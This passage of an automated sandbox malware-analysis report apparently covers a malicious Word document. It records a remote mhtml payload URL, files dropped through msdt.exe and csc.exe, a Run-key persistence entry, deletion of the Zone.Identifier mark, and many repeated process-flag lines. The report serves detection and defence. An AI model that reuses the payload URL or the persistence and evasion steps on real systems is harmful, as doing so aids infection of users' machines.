                Source: 15.0.PROMZwFp385vXrN.exe.7b0000.0.unpack, wSdw78jkfQ8V3Hyi0v/j5lRjLYjk7bvnDuqC4.csHigh entropy of concatenated method names: '.cctor', '.ctor', 'MRNX2Yjj1k', 'Dispose', 'V3hTeRcjrJ', 'hjATuyniQy', 'PZUopuV0ZR', 'LYkoVp7A0J', 'bmTolCML9D', 'XbvoP2DvfD'
                Source: 15.0.PROMZwFp385vXrN.exe.7b0000.0.unpack, wSdw78jkfQ8V3Hyi0v/mtuOa5S3Tp4AAONJfH.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'R5eXGVI79E', 'wnnTzy1kDt', 'GTAMKLUS95', 'QRHMvpmWJv', 'TYJMdNpog7', 'vRLT5Ab4qZ', 'YdMTmyldP0', 'aa4TpqpFnv'
                Source: 15.0.PROMZwFp385vXrN.exe.7b0000.0.unpack, wSdw78jkfQ8V3Hyi0v/GVB1SfxmnmyMfuxbmf.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'H8yuS81PnG', 'Wr5RwRTupn', 'uPbRjdVnUJ', 'MFpRAfQRIE', 'XNRRntEB5f', 'MjPReDfXns', 'Vj1RupcDOe', 'KXPRstwr9r'
                Source: 15.0.PROMZwFp385vXrN.exe.7b0000.0.unpack, wSdw78jkfQ8V3Hyi0v/yJqi4q6AWHmirVFKMh.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'FxuAgRcQx', 'PI2TSQXemT', 'RLfTUZOfu7', 'jwnTawCrpj', 'QyiT8DDdQo', 'UKnT6TfkRf', 'xMRTbfpwfE', 'JgrTX9KZ4t'
                Source: 15.0.PROMZwFp385vXrN.exe.7b0000.0.unpack, wSdw78jkfQ8V3Hyi0v/ScFkWj7uxcaxMdsf4h.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'v31Bp7Svsl', 'zQNivLyfde', 'CmIidjPnvh', 'Sk6i7fF6vH', 'UxmiJwEu1I', 'rtxiLxoU28', 'cDoiTUyb8u', 'j6WMGkQcre'

                Persistence and Installation Behavior

                barindex
                Source: document.xml.relsExtracted files from sample: mhtml:https://pzsrblog.com/wp-content/uploads/2012/promzwfp385vxr!x-usc:https://pzsrblog.com/wp-content/uploads/2012/promzwfp385vxr
                Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_4fa3b06e-fc60-4be1-bad6-e51754719c96\en-US\DiagPackage.dll.muiJump to dropped file
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeFile created: C:\Users\user\AppData\Roaming\PMoZbw\PMoZbw.exeJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\mnm1snwx\mnm1snwx.dllJump to dropped file
                Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_4fa3b06e-fc60-4be1-bad6-e51754719c96\DiagPackage.dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\zf01cjt2\zf01cjt2.dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\yjsbg2wl\yjsbg2wl.dllJump to dropped file
                Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_4fa3b06e-fc60-4be1-bad6-e51754719c96\en-US\DiagPackage.dll.muiJump to dropped file
                Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_4fa3b06e-fc60-4be1-bad6-e51754719c96\DiagPackage.dllJump to dropped file
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run PMoZbwJump to behavior
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run PMoZbwJump to behavior

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeFile opened: C:\Users\user\AppData\Roaming\PMoZbw\PMoZbw.exe:Zone.Identifier read attributes | delete
                Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXERegistry key monitored for changes: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\PMoZbw\PMoZbw.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: 00000013.00000002.625883552.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
